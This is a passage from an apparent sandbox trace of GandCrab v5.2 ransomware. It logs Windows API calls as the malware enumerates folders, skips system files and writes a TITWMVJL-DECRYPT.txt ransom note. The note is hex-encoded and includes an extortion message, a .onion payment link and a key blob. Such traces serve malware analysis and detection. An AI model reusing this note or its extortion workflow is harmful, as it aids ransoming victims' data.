Sidebar\\TITWMVJL-DECRYPT.txt" [0096.225] lstrlenW (lpString=".titwmvjl") returned 9 [0096.225] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\TITWMVJL-DECRYPT.txt") returned 77 [0096.225] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.225] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 86 [0096.225] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\TITWMVJL-DECRYPT.txt") returned 77 [0096.225] lstrlenW (lpString=".txt") returned 4 [0096.225] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.225] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.225] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.225] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.225] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\TITWMVJL-DECRYPT.txt") returned 77 [0096.225] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\TITWMVJL-DECRYPT.txt") returned 77 [0096.225] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.226] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.226] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.226] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0096.226] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0096.226] CloseHandle (hObject=0x2bc) returned 1 [0096.226] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0096.226] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0096.227] CloseHandle (hObject=0x2b4) returned 1 [0096.227] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.227] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0096.227] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0096.227] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Temp" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0096.227] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\" [0096.227] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.228] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.228] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.228] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.228] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.228] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.229] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.229] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\\\TITWMVJL-DECRYPT.txt") returned 57 [0096.229] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0096.230] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x